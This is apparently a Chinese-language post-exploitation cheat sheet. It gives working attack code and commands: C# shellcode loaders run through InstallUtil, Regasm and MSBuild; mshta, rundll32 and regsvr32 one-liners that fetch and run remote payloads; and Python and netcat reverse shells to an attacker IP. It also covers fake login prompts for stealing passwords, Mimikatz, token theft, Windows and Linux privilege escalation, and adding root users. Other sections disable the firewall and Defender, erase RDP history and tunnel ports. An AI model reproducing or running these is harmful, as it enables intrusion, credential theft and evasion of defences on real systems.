[DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr DStOGXQMMkP, uint CzzIpcuQppQSTBJ, uint JCFImGhkRqtwANx, out uint exgVpSg);
[DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 eisuQbXKYbAvA, UInt32 WQATOZaFz, IntPtr AEGJQOn,IntPtr SYcfyeeSgPl, UInt32 ZSheqBwKtDf, ref UInt32 SZtdSB);
[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr KqJNFlHpsKOV, UInt32 EYBOArlCLAM);
public yrDaTlg() {
byte[] QWKpWKhcs =
{SHELLCODE
};
IntPtr AmnGaO = VirtualAlloc(0, (UInt32)QWKpWKhcs.Length, 0x3000, 0x04);
Marshal.Copy(QWKpWKhcs, 0, (IntPtr)(AmnGaO), QWKpWKhcs.Length);
IntPtr oXmoNUYvivZlXj = IntPtr.Zero; UInt32 XVXTOi = 0; IntPtr pAeCTfwBS = IntPtr.Zero;
uint BnhanUiUJaetgy;
bool iSdNUQK = VirtualProtect(AmnGaO, (uint)0x1000, (uint)0x20, out BnhanUiUJaetgy);
oXmoNUYvivZlXj = CreateThread(0, 0, AmnGaO, pAeCTfwBS, 0, ref XVXTOi);
WaitForSingleObject(oXmoNUYvivZlXj, 0xFFFFFFFF);}
}

Csc

>msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.0.107 LPORT=12138 -f csharp
>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.Ente rpriseServices.dll /r:System.IO.Compression.dll /target:library /out: C:\Users\y\Desktop\shell.exe /platform:x64 /unsafe C:\Users\y\Desktop\shell.cs
>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\y\Desktop\shell.exe
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices; 
public class Program
{
public static void Main()
{
}
}
[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
public override void Uninstall(System.Collections.IDictionary savedState)
{
Shellcode.Exec();
}
}
public class Shellcode
{
public static void Exec()
{
byte[] shellcode = new byte[510] {
 SHELLCODE
};
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode .Length,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
}
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern bool VirtualFree(IntPtr lpAddress,
UInt32 dwSize, UInt32 dwFreeType);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport("kernel32")]
private static extern bool CloseHandle(IntPtr handle);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
[DllImport("kernel32")]
private static extern IntPtr GetModuleHandle(
string moduleName
);
[DllImport("kernel32")]
private static extern UInt32 GetProcAddress(
IntPtr hModule,
string procName
);
[DllImport("kernel32")]
private static extern UInt32 LoadLibrary(
string lpFileName
);
[DllImport("kernel32")]
private static extern UInt32 GetLastError();
}

Regasm

>C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out: C:\Users\y\Desktop\dll.dll  /unsafe C:\Users\y\Desktop\dll.cs
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /u dll.dll
namespace HYlDKsYF
 {
	 public class kxKhdVzWQXolmmF : ServicedComponent {
		 public kxKhdVzWQXolmmF() { Console.WriteLine("doge"); }
		 [ComRegisterFunction]
		 public static void RegisterClass ( string pNNHrTZzW )
		 {
			 ZApOAKJKY.QYJOTklTwn();
			 }
			 [ComUnregisterFunction]
			 public static void UnRegisterClass ( string pNNHrTZzW )
			 {
				 ZApOAKJKY.QYJOTklTwn();
				 }
				 }
				 public class ZApOAKJKY  { [DllImport("kernel32")] private static extern UInt32 HeapCreate(UInt32 FJyyNB, UInt32 fwtsYaiizj, UInt32 dHJhaXQiaqW);
				 [DllImport("kernel32")] private static extern UInt32 HeapAlloc(UInt32 bqtaDNfVCzVox, UInt32 hjDFdZuT, UInt32 JAVAYBFdojxsgo);
				 [DllImport("kernel32")] private static extern UInt32 RtlMoveMemory(UInt32 AQdEyOhn, byte[] wknmfaRmoElGo, UInt32 yRXPRezIkcorSOo);
				 [DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 uQgiOlrrBaR, UInt32 BxkWKqEKnp, UInt32 lelfRubuprxr, IntPtr qPzVKjdiF,UInt32 kNXJcS, ref UInt32 atiLJcRPnhfyGvp);
				 [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr XSjyzoKzGmuIOcD, UInt32 VumUGj);static byte[] HMSjEXjuIzkkmo(string aCWWUttzmy,int iJGvqiEDGLhjr) {
					 IPEndPoint YUXVAnzAurxH = new IPEndPoint(IPAddress.Parse(aCWWUttzmy),iJGvqiEDGLhjr);
					 Socket MXCEuiuRIWgOYze = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
					 try { MXCEuiuRIWgOYze.Connect(YUXVAnzAurxH); }
					 catch { return null;}
					 byte[] Bjpvhc = new byte[4];
					 MXCEuiuRIWgOYze.Receive(Bjpvhc,4,0);
int IETFBI = BitConverter.ToInt32(Bjpvhc,0);
byte[] ZKSAAFwxgSDnTW = new byte[IETFBI +5];
int JFPJLlk =0;
while(JFPJLlk < IETFBI)
{ JFPJLlk += MXCEuiuRIWgOYze.Receive(ZKSAAFwxgSDnTW, JFPJLlk +5,(IETFBI - JFPJLlk)<4096 ? (IETFBI - JFPJLlk) : 4096,0);}
byte[] nXRztzNVwPavq = BitConverter.GetBytes((int)MXCEuiuRIWgOYze.Handle);
Array.Copy(nXRztzNVwPavq,0, ZKSAAFwxgSDnTW,1,4); ZKSAAFwxgSDnTW[0]=0xBF;
return ZKSAAFwxgSDnTW;}
static void TOdKEwPYRUgJly(byte[] KNCtlJWAmlqJ) {
	if(KNCtlJWAmlqJ !=null) {
		UInt32 uuKxFZFwog = HeapCreate(0x00040000,(UInt32)KNCtlJWAmlqJ.Length,0);
	UInt32 sDPjIMhJIOAlwn = HeapAlloc(uuKxFZFwog,0x00000008,(UInt32)KNCtlJWAmlqJ.Length);
	RtlMoveMemory(sDPjIMhJIOAlwn, KNCtlJWAmlqJ,(UInt32)KNCtlJWAmlqJ.Length);
	UInt32 ijifOEfllRl =0;
	IntPtr ihXuoEirmz = CreateThread(0,0, sDPjIMhJIOAlwn, IntPtr.Zero,0, ref ijifOEfllRl);
	WaitForSingleObject(ihXuoEirmz,0xFFFFFFFF);}}
	
	public static void QYJOTklTwn() {
		byte[] ZKSAAFwxgSDnTW =null; ZKSAAFwxgSDnTW = HMSjEXjuIzkkmo("192.168.0.107",12138);
		TOdKEwPYRUgJly(ZKSAAFwxgSDnTW);
		} } }

Msbuild

https://gitee.com/RichChigga/msbuild-exec
MSF监听
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe 1.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="iJEKHyTEjyCU">
<xUokfh />
</Target>
<UsingTask
TaskName="xUokfh"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices;
using System.Threading; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;
public class xUokfh : Task, ITask {
[DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 ogephG,UInt32 fZZrvQ, UInt32 nDfrBaiPvDyeP, UInt32 LWITkrW);
[DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 qEVoJxknom, UInt32 gZyJBJWYQsnXkWe, UInt32 jyIPELfKQYEVZM,IntPtr adztSLHGJiurGO, UInt32 vjSCprCJ, ref UInt32 KbPukprMQXUp);
[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr wVCIQGmqjONiM, UInt32 DFgVrE);
static byte[] VYcZlUehuq(string IJBRrBqhigjGAx, int XBUCexXIrGIEpe) {
IPEndPoint DRHsPzS = new IPEndPoint(IPAddress.Parse(IJBRrBqhigjGAx),XBUCexXIrGIEpe);
Socket zCoDOd = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
try { zCoDOd.Connect(DRHsPzS); }
catch { return null;}
byte[] OCrGofbbWRVsFEl = new byte[4];
zCoDOd.Receive(OCrGofbbWRVsFEl, 4, 0);
int auQJTjyxYw = BitConverter.ToInt32(OCrGofbbWRVsFEl, 0);
byte[] MlhacMDOKUAfvMX = new byte[auQJTjyxYw + 5];
int GFtbdD = 0;
while (GFtbdD < auQJTjyxYw)
{ GFtbdD += zCoDOd.Receive(MlhacMDOKUAfvMX, GFtbdD + 5, (auQJTjyxYw -GFtbdD) < 4096 ? (auQJTjyxYw - GFtbdD) : 4096, 0);}
byte[] YqBRpsmDUT = BitConverter.GetBytes((int)zCoDOd.Handle);
Array.Copy(YqBRpsmDUT, 0, MlhacMDOKUAfvMX, 1, 4); MlhacMDOKUAfvMX[0]= 0xBF;
return MlhacMDOKUAfvMX;}
static void NkoqFHncrcX(byte[] qLAvbAtan) {
if (qLAvbAtan != null) {
UInt32 jrYMBRkOAnqTqx = VirtualAlloc(0, (UInt32)qLAvbAtan.Length, 0x1000, 0x40);
Marshal.Copy(qLAvbAtan, 0, (IntPtr)(jrYMBRkOAnqTqx),qLAvbAtan.Length);
IntPtr WCUZoviZi = IntPtr.Zero;
UInt32 JhtJOypMKo = 0;
IntPtr UxebOmhhPw = IntPtr.Zero;
WCUZoviZi = CreateThread(0, 0, jrYMBRkOAnqTqx, UxebOmhhPw, 0, ref JhtJOypMKo);
WaitForSingleObject(WCUZoviZi, 0xFFFFFFFF); }}
public override bool Execute()
{
byte[] uABVbNXmhr = null; uABVbNXmhr = VYcZlUehuq("192.168.0.107",12138);
NkoqFHncrcX(uABVbNXmhr);
return true; } }
]]>
</Code>
</Task>
</UsingTask>
</Project>

Winrm

MSF监听

image

>mkdir winrm
>copy c:\Windows\System32\cscript.exe winrm
创建文件WsmPty.xsl复制payload进去
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
 <ms:script implements-prefix="user" language="JScript">
 <![CDATA[
 var r = new ActiveXObject("WScript.Shell").Run("cmd");
 ]]> </ms:script>
</stylesheet>

image

执行
>cscript.exe //nologo C:\Windows\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty

image

Mshta

>use exploit/windows/misc/hta_server
>set srvhost 192.168.0.107
>mshta http://192.168.0.107:8080/RgNeCv.hta

image

执行vb
	>mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)
Js
	>mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}
Jsrat
	>mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.2.101:9998/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}

Regsvr32

上线Empire
>usestager windows/launcher_sct
生成sct文件放入web目录
>regsvr32 /s /n /u /i:http://192.168.0.107:8080/launcher.sct scrobj.dll
>cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:http://192.168.0.107/test.sct

Rundll32

执行文件
>rundll32 url.dll, OpenURL file://c:\windows\system32\calc.exe
>rundll32 url.dll, OpenURLA file://c:\windows\system32\calc.exe
>rundll32 url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
>rundll32 url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
>rundll32 url.dll, FileProtocolHandler calc.exe
无弹窗执行
>rundll32 javascript:"\..\mshtml,RunHTMLApplication ";new%20ActiveXObject("WScript.Shell").Run("C:/Windows/System32/mshta.exe http://192.168.0.107:8080/SU8Fd6kNRz0.hta",0,true);self.close();
增删注册表
保存为.inf文件
>rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:/reg.inf
[Version]
Signature="$WINDOWS NT$"
[DefaultInstall]
AddReg=AddReg
DelReg=DelReg
[AddReg] #删除DelReg删掉红色部分执行
HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,SYSTEM,0x00000000,c:/windows/temp/sv.exe
0x00010001表示REG_DWORD数据类型,0x00000000或省略该项(保留逗号)表示REG_SZ(字符串)
写文件
>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";fso=new%20ActiveXObject("Scripting.FileSystemObject");a=fso.CreateTextFile("c:\\Temp\\testfile.txt",true);a.WriteLine("Test");a.Close();self.close();
Out-RundllCommand
使用nishang脚本Out-RundllCommand生成rundll代码
>powershell -nop -w h -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Execution/Out-RundllCommand.ps1'); Out-RundllCommand -Reverse -IPAddress 192.168.0.107 -Port 12345"

image image

注:低版本powershell,隐藏窗口只识别-w hidden,高版本可以-w h
执行远程PS脚本
>Out-RundllCommand -PayloadURL http://192.168.0.107/Invoke-PowerShellUdp.ps1 -Arguments "Invoke-PowerShellUdp -Reverse -IPAddress 192.168.0.107 -Port 12138"
上线MSF
生成psh-reflection格式脚本
>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();r=new%20ActiveXObject("WScript.Shell").run("powershell -w hidden -nologo -noprofile -ep bypass IEX ((New-Object Net.WebClient).DownloadString('http://192.168.0.107/xx.ps1'));",0,true);

DotNetToJScript

通过js/vbs执行.net程序
https://github.com/tyranid/DotNetToJScript/releases
>DotNetToJScript.exe -o 1.js ExampleAssembly.dll 生成js
>DotNetToJScript.exe -l vbscript -o 2.vbs ExampleAssembly.dll生成vbs
>DotNetToJScript.exe -l vba -o 2.txt ExampleAssembly.dll 生成vba
>DotNetToJScript.exe -u -o 3.sct ExampleAssembly.dll生成sct
StarFighters
https://github.com/Cn33liz/StarFighters 可以执行powershell代码,详见
执行单条命令
$code = 'start calc.exe'
$bytes  = [System.Text.Encoding]::UNICODE.GetBytes($code);
$encoded = [System.Convert]::ToBase64String($bytes)
$encoded
复制为var EncodedPayload的值
远程执行mimikatz
powershell IEX "(New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/powersploit/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Command 'log privilege::debug sekurlsa::logonpasswords'"
以上保存在code.txt
$code = Get-Content -Path code.txt
$bytes  = [System.Text.Encoding]::UNICODE.GetBytes($code);
$encoded = [System.Convert]::ToBase64String($bytes)
$encoded | Out-File 2.txt

image

生成的2.txt文件内容替换为var EncodedPayload的值再执行

image image

绕过AMSI执行
>copy c:\windows\system32\cscript.exe amsi.dll
>amsi.dll evil.js

WMIC

Empire建立监听,生成windows/launcher_xsl模块的xsl文件保存在web目录
>wmic process get brief /format:http://192.168.0.107:8080/launcher.xsl
也可结合mshta使用
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
	<ms:script implements-prefix="user" language="JScript">
	<![CDATA[
	var r = new ActiveXObject("WScript.Shell").Run("mshta http://192.168.0.107:8080/RgNeCv.hta");
	]]> </ms:script>
</stylesheet>

Msxsl

下载
https://www.microsoft.com/en-us/download/details.aspx?id=21714
远程执行shellcode
https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker/blob/master/shellcode.xml
>msxls.exe http://192.168.0.107/shellcode.xml http://192.168.0.107/shellcode.xml
Empire生成shellcode贴到脚本中EncodedPayload位置

image

CPL

Kali监听

image

编译成DLL

image

Control执行
>control C:\Users\Administrator.DC\Desktop\VC6.0green\MyProjects\dll\Debug\dll.dll

image

或将DLL后缀改为cpl,双击执行,或rundll32执行
>rundll32.exe shell32.dll,Control_RunDLL C:\Users\Administrator.DC\Desktop\VC6.0green\MyProjects\dll\Debug\dll.dll

Runas

#use exploit/windows/local/ask

令牌窃取

MSF

Meterpreter>use incognito
Meterpreter>list_tokens -u
Meterpreter>impersonate_token name\\administrator
&
Meterpreter>ps
Meterpreter>steal_token pid

Cobalt strike

beacon> steal_token 1234 窃取令牌
beacon> rev2self 恢复令牌
Windows
https://gitee.com/RichChigga/incognito2

密码窃取

伪造锁屏

https://github.com/Pickfordmatt/SharpLocker/releases

image

https://github.com/bitsadmin/fakelogonscreen/releases

image

记录的密码保存在
%LOCALAPPDATA%\Microsoft\user.db

image

伪造认证框

CredsLeaker
https://github.com/Dviros/CredsLeaker
将cl_reader.php,config.php,config.cl上传到web服务器
修改CredsLeaker.ps1、run.bat中URL参数

image

输入正确密码后会自动结束,否则除非结束powershell进程才可结束
获取到正确密码后会在目录下生成creds.txt保存密码信息

image

LoginPrompt
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/Invoke-LoginPrompt.ps1');invoke-LoginPrompt"

image

除非结束进程,否则只能输对密码才能关闭对话框。
收到正确密码会返回结果

image

Nishang-Invoke-CredentialsPhish
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.108/ps/nishang/Gather/Invoke-CredentialsPhish.ps1'); Invoke-CredentialsPhish"

image image

RottenPotato

https://github.com/foxglovesec/RottenPotato Meterpreter>use incognito
Meterpreter>list_tokens -u
Meterpreter>upload /root/Desktop/rottenpotato.exe
Meterpreter>execute -HC -f rottenpotato.exe
Meterpreter>impersonate_token "NT AUTHORITY\\SYSTEM"

PowerUp

检测有漏洞的服务
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powertools/PowerUp/PowerUp.ps1');Invoke-AllChecks"

image

>icacls C:\Windows\system32\\wlbsctrl.dll 查看文件权限,F为完全控制,M修改

image

在AbuseFunction中会显示利用语句。
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powertools/PowerUp/PowerUp.ps1'); Write-HijackDll -OutputFile 'C:\Windows\system32\\wlbsctrl.dll' -Command 'net user admin pass@Qwe1 /add&net localgroup administrators admin /add'"

image

重启电脑后会新增用户admin

image

查找可能劫持的进程
>Find-ProcessDLLHijack
查找环境变量中当前用户可修改的目录
>Find-PathDLLHijack
查找存在注册表中自动登录用户的平局
>Get-RegistryAutoLogon
查询trusted_service_path
>Get-ServiceUnquoted
查询当前用户可修改的注册表开机启动项
>Get-ModifiableRegistryAutoRun
查询当前用户可修改的计划任务项
>Get-ModifiableScheduledTaskFile
查询系统中所有web.config文件中的明文密码
>Get-WebConfig

Powerup-AlwaysInstallElevated

>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powertools/PowerUp/PowerUp.ps1');Get-RegAlwaysInstallElevated"

image

>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powertools/PowerUp/PowerUp.ps1'); Write-UserAddMSI"
普通用户执行安装

image image

AlwaysInstallElevated提权

>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
为1 检测是否永远以高权限启动安装
#HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
新建DWORD32 DisableMSI=0
#msfvenom -p windows/adduser USER=msi PASS=pass@123 -f msi -o /root/add.msi
#upload /root/add.msi c:\\1.msi
>msiexec /quiet /qn /i c:\1.msi
MSF
#use exploit/windows/local/always_install_elevated
#set session 1

Trusted Service Paths

>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ 列出没有用引	号包含的服务
#use exploit/windows/local/trusted_service_path
#set session 1

Vulnerable Services

#use exploit/windows/local/service_permissions
#set session 1

Sudo提权

/home/user/.sudo_as_admin_successful
>sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"
>sudo tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash
>sudo strace –o /dev/null /bin/bash
>sudo nmap –interactive nmap>!sh
>echo "os.execute('/bin.sh')">/tmp/1.nse
>sudo nmap –script=/tmp/shell.nse 
>sudo more/less/man /etc/rsyslog.conf
>sudo git help status 
>!/bin/bash
>sudo ftp
>!/bin/bash
>sudo vim -c '!sh'
>sudo find /bin/ -name ls -exec /bin/bash ;
>sudo awk 'BEGIN {system("/bin/sh")}'

Linux计划任务

>for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; done 列举所有用户的crontab
$cat /etc/crontab
$echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' >test.sh
$echo "" > "--checkpoint-action=exec=sh test.sh"
$echo "" > --checkpoint=1
或编辑可写的计划任务文件
#!/usr/bin/python
import os,subprocess,socket
s=socket.socekt(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.0.107","5555"))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

Linux SUID提权

查找有root权限的SUID文件
$find / -perm -u=s -type f 2>/dev/null
$find / -user root -perm -4000 -print 2>/dev/null
$find / -user root -perm -4000 -exec ls -ldb {} \;

Find

$touch xxx
$/usr/bin/find xxx –exec whoami \;
$/usr/bin/find xxx –exec python -c 'import 	socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'  \;
&
>find xxx -exec netcat -lvp 12138 -e /bin/sh \; 然后攻击机主动连接

NMAP

# 进入nmap的交互模式
>nmap --interactive 
>!sh

VIM

>vim.tiny /etc/shadow
&
>vim.tiny
# 按ESC
:set shell=/bin/sh
:shell

BASH

>bash –p

####More/Less/Man >less /etc/passwd !/bin/sh >more /etc/passwd !/bin/bash >man passwd !/bin/bash

CP/MV

覆盖shadow文件

Linux /etc/passwd提权

$ls –lh /etc/passwd 若是任何用户可读写
$perl -le 'print crypt("password@123","addedsalt")' 生成密码
$echo "test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd
一条命令添加root用户
#useradd -p `openssl passwd -1 -salt 'user' 123qwe` -u 0 -o -g root  -G root -s /bin/bash -d /home/user venus
用户名venus 密码123qwe
#useradd newuser;echo "newuser:password"|chpasswd
>echo "admin:x:0:0::/:/bin/sh" >> /etc/passwd
>passwd admin修改密码

Linux脏牛提权

https://github.com/FireFart/dirtycow
$gcc -pthread dirty.c -o dirty –lcrypt
$./dirty passwd 
生成账户密码
https://github.com/gbonacini/CVE-2016-5195
$make
$./dcow -s

RDP&Fireawall

爆破

Hydra爆破RDP
>hydra -l admin -P /root/Desktop/passwords -S 192.168.0.0 rdp
&
Nlbrute

image

注册表开启

查询系统是否允许3389远程连接:
>REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
1表示关闭,0表示开启
查看远程连接的端口:
>REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
本机开启3389远程连接的方法
通过cmd
>REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
>REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f
通过reg文件
内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000d3d
导入注册表:
regedit /s a.reg

NETSH启动服务

>netsh firewall set service remoteadmin enable 
>netsh firewall set service remotedesktop enable
>netsh firewall set opmode disable 关闭防火墙

注入点开启

.asp?id=100;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--
注:
修改连接端口重启后生效

MSF开启

#run post/windows/manage/enable_rdp

Wmic开启

>wmic /node:192.168.1.2 /USER:administrator PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1

防火墙

允许进站
如果系统未配置过远程桌面服务,第一次开启时还需要添加防火墙规则,允许3389端口,命令如下:
>netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
>netsh firewall set portopening TCP 3389 ENABLE
防火墙关闭
>netsh firewall set opmode mode=disable
>netsh advfirewall show allprofiles查看状态
>netsh advfirewall set allprofiles state off 
>sc stop windefend
>sc delete windefend
PS> Set-MpPreference -DisableRealtimeMonitoring 1
PS> Set-MpPreference -Disablearchivescanning $true

多用户登录

Mimikatz设置允许多用户登录
>privilege::debug
>ts::multirdp
rdpwrap
https://github.com/stascorp/rdpwrap
>RDPWInst.exe -i is

RDP连接记录

https://github.com/3gstudent/List-RDP-Connections-History
查看本机用户连接RDP的记录

image

>Psloggedon.exe username

image

删除痕迹

@echo off
@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
@del "%USERPROFILE%\My Documents\Default.rdp" /a
@exit

端口映射&转发

MSF

使用条件:服务器通外网,拥有自己的公网ip
>portfwd add -l 5555 -p 3389 -r 172.16.86.153
转发目标主机的3389远程桌面服务端口到本地的5555
>portfwd list

lcx.exe

使用条件:服务器通外网,拥有自己的公网ip
靶机:lcx.exe -slave 外网IP 9999 127.0.0.1 3389
linux攻击机:./portmap -m 2 -p1 9999 -p2 33889
windows攻击机:lcx -listen 9999 33889 把本机9999监听的信息转到33889
PortTran
https://github.com/k8gege/K8tools/raw/master/PortTran.rar
攻击机执行
>PortTranS20.exe 12345 389

image

靶机执行
>PortTranC20.exe 127.0.0.1 3389 192.168.0.102 12345
建立连接后,攻击机连接本机389端口即可

image

SSH

-C 压缩传输,加快传输速度
-f 在后台对用户名密码进行认证
-N 仅仅只用来转发,不用再弹回一个新的shell -n 后台运行
-q 安静模式,不要显示任何debug信息
-l 指定ssh登录名
-g 允许远程主机连接到本地用于转发的端口
-L 进行本地端口转发
-R 进行远程端口转发
-D 动态转发,即socks代理
-T 禁止分配伪终端
-p 指定远程ssh服务端口

正向转发

外网靶机110
内网靶机115
本地攻击机编辑后restart ssh服务
#vim /etc/ssh/sshd_conf
AllowTcpForwarding yes 允许TCP转发
GatewayPorts yes   允许远程主机连接本地转发的端口
TCPKeepAlive yes    TCP会话保持存活
PasswordAuthentication yes  密码认证
>ssh -C -f -N -g -L 33890:192.168.0.115:3389 root@192.168.0.110 -p 22
本地攻击机执行,本地33890转发到远程的3389端口
上线MSF
攻击机出网Linux靶机--不出网Linux靶机--不出网win机
>msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=不出网Linux机 lport=12138 -f exe -o /var/www/html/1.exe
攻击机监听端口12345
不出网Linux机
>ssh -C -f -N -g -L 0.0.0.0:12138:攻击机:12345 root@出网Linux主机 -p 22

反向转发

外网攻击107
内网靶机97
出网靶机编辑后restart ssh服务
#vim /etc/ssh/sshd_conf
AllowTcpForwarding yes 允许TCP转发
GatewayPorts yes   允许远程主机连接本地转发的端口
TCPKeepAlive yes    TCP会话保持存活
PasswordAuthentication yes  密码认证
>ssh -C -f -N -g -R 33890:10.1.1.97:3389 root@192.168.0.107 -p 22
出网靶机执行,把外部攻击机33890转发到内部隔离网络的3389
>netstat –tnlp

image

转发成功,外网攻击机安装apt install rinetd(正向tcp转发工具)
>vim /etc/rinetd.conf
添加0.0.0.0 3389 127.0.0.1 33890
>service rinetd start

image

看到107是kali攻击机,连接107:33890即可到达内网10.1.1.97的桌面

image

Invoke-SocksProxy

https://gitee.com/RichChigga/Invoke-SocksProxy
>Import-Module .\Invoke-SocksProxy.psm1 
